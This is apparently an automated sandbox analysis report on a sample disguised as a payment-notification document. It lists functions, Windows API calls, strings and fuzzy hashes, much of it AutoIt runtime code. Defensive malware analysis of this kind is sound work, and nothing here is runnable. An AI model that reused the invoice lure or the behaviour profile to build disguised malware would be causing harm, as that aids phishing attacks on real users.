Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4137639002-1221869570
Opcode ID: d263f936fe1f06884f4e9d3a54ef39ca7fae6f02da41525f4615c4b1923a3f0f
Instruction ID: 9cf141939b5013cdc6dc8a2cff1dc0c3e341ed1465bb191356f4f74ee8dd6c99
Opcode Fuzzy Hash: d263f936fe1f06884f4e9d3a54ef39ca7fae6f02da41525f4615c4b1923a3f0f
Instruction Fuzzy Hash: 1A9175756083459FC714EF68C48192AB7E8FF89714F14882EF88A9B351DB30EE45CB82

Function 00964BAD Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 236COMMON

Download Yara Rule

APIs

Part of subcall function 0094000E: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,0093FF41,80070057,?,?,?,0094035E), ref: 0094002B
Part of subcall function 0094000E: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0093FF41,80070057,?,?), ref: 00940046
Part of subcall function 0094000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0093FF41,80070057,?,?), ref: 00940054
Part of subcall function 0094000E: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0093FF41,80070057,?), ref: 00940064

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00964C51
_wcslen.LIBCMT ref: 00964D59
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00964DCF
CoTaskMemFree.OLE32(?), ref: 00964DDA

Strings

NULL Pointer assignment, xrefs: 00964E23, 00964E52

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
String ID: NULL Pointer assignment
API String ID: 614568839-2785691316
Opcode ID: 6f9da9de1ed8db8b32f6d5e2625692e07bb0b1e8698285d201450b974019236c
Instruction ID: 4d9268a45281d0847e33837475b27b16341c4b8af4162a56bee6e92d83a6f08f
Opcode Fuzzy Hash: 6f9da9de1ed8db8b32f6d5e2625692e07bb0b1e8698285d201450b974019236c
Instruction Fuzzy Hash: 90912771D0021DAFDF15DFA4C891AEEB7B8FF48300F108169E919A7291DB34AA44CFA1

Function 009720FD Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 00972183
GetMenuItemCount.USER32(00000000), ref: 009721B5
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 009721DD
_wcslen.LIBCMT ref: 00972213
GetMenuItemID.USER32(?,?), ref: 0097224D
GetSubMenu.USER32(?,?), ref: 0097225B

Part of subcall function 00943A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00943A57
Part of subcall function 00943A3D: GetCurrentThreadId.KERNEL32 ref: 00943A5E
Part of subcall function 00943A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,009425B3), ref: 00943A65

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 009722E3

Part of subcall function 0094E97B: Sleep.KERNEL32 ref: 0094E9F3

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
String ID:
API String ID: 4196846111-0
Opcode ID: 9e072a0f44898685bde316419a98f42e922a079535600946e4927da0aa5b255e
Instruction ID: 7814c9e585fc573b7beba8976516535b18f9f0ae3fdca31a7951d4b2666367a2
Opcode Fuzzy Hash: 9e072a0f44898685bde316419a98f42e922a079535600946e4927da0aa5b255e
Instruction Fuzzy Hash: CD71A276E14205AFCB14DF68C881AAEB7F5FF88310F148459E92AEB351DB34ED418B90

Function 00977E9E Relevance: 10.7, APIs: 7, Instructions: 193windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(01997078), ref: 00977F37
IsWindowEnabled.USER32(01997078), ref: 00977F43
SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0097801E
SendMessageW.USER32(01997078,000000B0,?,?), ref: 00978051
IsDlgButtonChecked.USER32(?,?), ref: 00978089
GetWindowLongW.USER32(01997078,000000EC), ref: 009780AB
SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 009780C3

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: MessageSendWindow$ButtonCheckedEnabledLong
String ID:
API String ID: 4072528602-0
Opcode ID: 2150ea8c218bd978e1325ea937e38449afaab44d4e3ce9e0c00c4cce4754a774
Instruction ID: 725a997a32b67e8eba5c6a776d15e4570c20916da2997f64ac42afb71c1df1ce
Opcode Fuzzy Hash: 2150ea8c218bd978e1325ea937e38449afaab44d4e3ce9e0c00c4cce4754a774
Instruction Fuzzy Hash: 6F71A076608244AFEB219FA4C994FFABBB9EF49300F148859F94D97261CB31A844DB10

Function 0094AEBA Relevance: 10.7, APIs: 7, Instructions: 162windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 0094AEF9
GetKeyboardState.USER32(?), ref: 0094AF0E
SetKeyboardState.USER32(?), ref: 0094AF6F
PostMessageW.USER32(?,00000101,00000010,?), ref: 0094AF9D
PostMessageW.USER32(?,00000101,00000011,?), ref: 0094AFBC
PostMessageW.USER32(?,00000101,00000012,?), ref: 0094AFFD
PostMessageW.USER32(?,00000101,0000005B,?), ref: 0094B020

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 017ed3c91b67ad1c0cce73e43843a1f5cc847aa13f99aa7bee623e3d38b0f626
Instruction ID: d07757cfeac22b0fc811e3cf66b86791d9fbde389e40de3eb3ce23e454b74637
Opcode Fuzzy Hash: 017ed3c91b67ad1c0cce73e43843a1f5cc847aa13f99aa7bee623e3d38b0f626
Instruction Fuzzy Hash: 7F51CDA1A487D53DFB3682348C45FBBBEAD5B06304F088989E1E9958C2D3D8EDC8D751

Function 0094ACDA Relevance: 10.7, APIs: 7, Instructions: 161windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 0094AD19
GetKeyboardState.USER32(?), ref: 0094AD2E
SetKeyboardState.USER32(?), ref: 0094AD8F
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 0094ADBB
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 0094ADD8
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 0094AE17
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 0094AE38

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: f8170d714a66dfba414e371c5ae0911f7082c2db1a482fb666472596797fd4d7
Instruction ID: d024219403177082123ff83c33a2d030644adfa65a41f6c20de630db985a2b86
Opcode Fuzzy Hash: f8170d714a66dfba414e371c5ae0911f7082c2db1a482fb666472596797fd4d7
Instruction Fuzzy Hash: 8251D5A19887D53DFB3683348C95F7B7EAC5B46304F088588E1E9468C2D294ED88E752

Function 0091542E Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(00923CD6,?,?,?,?,?,?,?,?,00915BA3,?,?,00923CD6,?,?), ref: 00915470
__fassign.LIBCMT ref: 009154EB
__fassign.LIBCMT ref: 00915506
WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00923CD6,00000005,00000000,00000000), ref: 0091552C
WriteFile.KERNEL32(?,00923CD6,00000000,00915BA3,00000000,?,?,?,?,?,?,?,?,?,00915BA3,?), ref: 0091554B
WriteFile.KERNEL32(?,?,00000001,00915BA3,00000000,?,?,?,?,?,?,?,?,?,00915BA3,?), ref: 00915584

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 3940286015e3d4a6283728b1f3c3a0af8d55640a0dad624cdb63daadca4fd897
Instruction ID: 805dbcdf876b633db3ea388f9044658cea219ca05e38425cfa1d15268a919754
Opcode Fuzzy Hash: 3940286015e3d4a6283728b1f3c3a0af8d55640a0dad624cdb63daadca4fd897
Instruction Fuzzy Hash: 9E51E5B1B00609DFDB10CFA8D845AEEBBFAEF49300F16451AF555E7291D7309A81CB60

Function 00902D20 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00902D4B
___except_validate_context_record.LIBVCRUNTIME ref: 00902D53
_ValidateLocalCookies.LIBCMT ref: 00902DE1
__IsNonwritableInCurrentImage.LIBCMT ref: 00902E0C
_ValidateLocalCookies.LIBCMT ref: 00902E61

Strings

csm, xrefs: 00902DF6

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: ffc3c42e9283f981ce17ece279fa40b1e6391fdd7a716f8805641a5dcbfb332f
Instruction ID: 5771cdf44958b204bb4f42d5e2f491460c38b705d42ca641f3daa6f06187eee3
Opcode Fuzzy Hash: ffc3c42e9283f981ce17ece279fa40b1e6391fdd7a716f8805641a5dcbfb332f
Instruction Fuzzy Hash: 4E418E34A00219EFCF10DF68C859A9EBBB9BF85324F148195E814AB3D2D775AE15CBD0

Function 009610B8 Relevance: 10.6, APIs: 7, Instructions: 110networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0096304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0096307A
Part of subcall function 0096304E: _wcslen.LIBCMT ref: 0096309B

socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00961112
WSAGetLastError.WSOCK32 ref: 00961121
WSAGetLastError.WSOCK32 ref: 009611C9
closesocket.WSOCK32(00000000), ref: 009611F9

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
String ID:
API String ID: 2675159561-0
Opcode ID: 401be9b4ab414cd56d12de1b623dabbb56e37da6cc4911beaee8310730b763e5
Instruction ID: a7b066bd64e21b7f1122ae5f88aac9d7257a4325b4da019b67993f67f5870a32
Opcode Fuzzy Hash: 401be9b4ab414cd56d12de1b623dabbb56e37da6cc4911beaee8310730b763e5
Instruction Fuzzy Hash: 2C41F672604204AFDB109F14C885BAAB7E9FF46364F198059FD19DB291CB74ED81CBE1

Function 0094CF00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0094DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0094CF22,?), ref: 0094DDFD

Part of subcall function 0094DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0094CF22,?), ref: 0094DE16

lstrcmpiW.KERNEL32(?,?), ref: 0094CF45
MoveFileW.KERNEL32(?,?), ref: 0094CF7F
_wcslen.LIBCMT ref: 0094D005
_wcslen.LIBCMT ref: 0094D01B
SHFileOperationW.SHELL32(?), ref: 0094D061

Strings

\*.*, xrefs: 0094CFF3

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
String ID: \*.*
API String ID: 3164238972-1173974218
Opcode ID: e854d9abaf99c06454db10c6e1eaa6599cb6b79ca8275f86e3afd5daefc65ab2
Instruction ID: 9c398c78981813a57f42eba183ad320be532aeb42ac62ba7c53fe37a7faaf1fa
Opcode Fuzzy Hash: e854d9abaf99c06454db10c6e1eaa6599cb6b79ca8275f86e3afd5daefc65ab2
Instruction Fuzzy Hash: 484156B59462189FDF12EBA4C981FDEB7BCAF48380F1000E6E505EB141EB35A688CB50

Function 00972DFD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00972E1C
GetWindowLongW.USER32(00000000,000000F0), ref: 00972E4F
GetWindowLongW.USER32(00000000,000000F0), ref: 00972E84
SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00972EB6
SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00972EE0
GetWindowLongW.USER32(00000000,000000F0), ref: 00972EF1
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00972F0B

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: e99fe97a4f8ba665c70e40e18fe838b32028a3b7a20873a7e05671979b8ea160
Instruction ID: 54898307ef22e19d92aa02da98af61a2e3f0b04fcb5eb489d9dc67812c153cec
Opcode Fuzzy Hash: e99fe97a4f8ba665c70e40e18fe838b32028a3b7a20873a7e05671979b8ea160
Instruction Fuzzy Hash: 69311532628141DFDB20CF58ED94F6937E4EF8A720F154168F9488F2B1CB71A880EB41

Function 00947726 Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00947769
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0094778F
SysAllocString.OLEAUT32(00000000), ref: 00947792
SysAllocString.OLEAUT32(?), ref: 009477B0
SysFreeString.OLEAUT32(?), ref: 009477B9
StringFromGUID2.OLE32(?,?,00000028), ref: 009477DE
SysAllocString.OLEAUT32(?), ref: 009477EC

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 05a908086cf029128371a2fc8d96dc341e7c45ba38b75ed3db420c7e751cb65a
Instruction ID: 86584bfb04b83875d53a37d7d5e082062876016e41d4c674b4ecf7fd5403304b
Opcode Fuzzy Hash: 05a908086cf029128371a2fc8d96dc341e7c45ba38b75ed3db420c7e751cb65a
Instruction Fuzzy Hash: 6421B07660821DAFDB10DFA8CC88CBBB7ACEF093647408429FA19DB161D770DC8187A0

Function 009477FD Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00947842
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00947868
SysAllocString.OLEAUT32(00000000), ref: 0094786B
SysAllocString.OLEAUT32 ref: 0094788C
SysFreeString.OLEAUT32 ref: 00947895
StringFromGUID2.OLE32(?,?,00000028), ref: 009478AF
SysAllocString.OLEAUT32(?), ref: 009478BD

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 2fb200c8f13e5563252e83189b463649127bcb7053df0b05783cf79bba2866ea
Instruction ID: 89e0f5dd3ad16cb584b5d7d43b807a3678449392ecc50f09806a2da169662aa4
Opcode Fuzzy Hash: 2fb200c8f13e5563252e83189b463649127bcb7053df0b05783cf79bba2866ea
Instruction Fuzzy Hash: D5213E76608208AF9B109BE8DC88DAAB7ACEB097607108525BA15DB2A1D774DC81DB64

Function 009504D2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 009504F2
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 0095052E

Strings

nul, xrefs: 00950567

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: CreateHandlePipe
String ID: nul
API String ID: 1424370930-2873401336
Opcode ID: bd41876a8b9b6cefaa9f8649cbb79ad8b822d21efe4fa9ac714fa5a8b42aef55
Instruction ID: fa546b65b27ca7f59ec072c28b610b64ad5dc8cd98f058e25c0fe293b777f1c5
Opcode Fuzzy Hash: bd41876a8b9b6cefaa9f8649cbb79ad8b822d21efe4fa9ac714fa5a8b42aef55
Instruction Fuzzy Hash: 85217E71500305EBDB20CF2BD804A9A77A8BF84725F204A19FCA1E62E0E770D949DF20

Function 009505A7 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 009505C6
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00950601

Strings

nul, xrefs: 00950639

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: CreateHandlePipe
String ID: nul
API String ID: 1424370930-2873401336
Opcode ID: 35ec3bb95645f632c079d1e2b8e4a63de46fe2fe9c28559a8ee9bf3bf35dbe13
Instruction ID: 12fc06fd3aa649fd2e1b97493e6bc3199f18af0d9f9ab64dc5746a697c5bc928
Opcode Fuzzy Hash: 35ec3bb95645f632c079d1e2b8e4a63de46fe2fe9c28559a8ee9bf3bf35dbe13
Instruction Fuzzy Hash: 92217F75501306DBDB20DF6ADC04A9A77A8AFD5721F240B19FCA1E72E0E77099A4CB10

Function 009740AD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 008E600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 008E604C
Part of subcall function 008E600E: GetStockObject.GDI32(00000011), ref: 008E6060
Part of subcall function 008E600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 008E606A

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00974112
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0097411F
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0097412A
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00974139
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00974145

Strings

Msctls_Progress32, xrefs: 009740E3

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

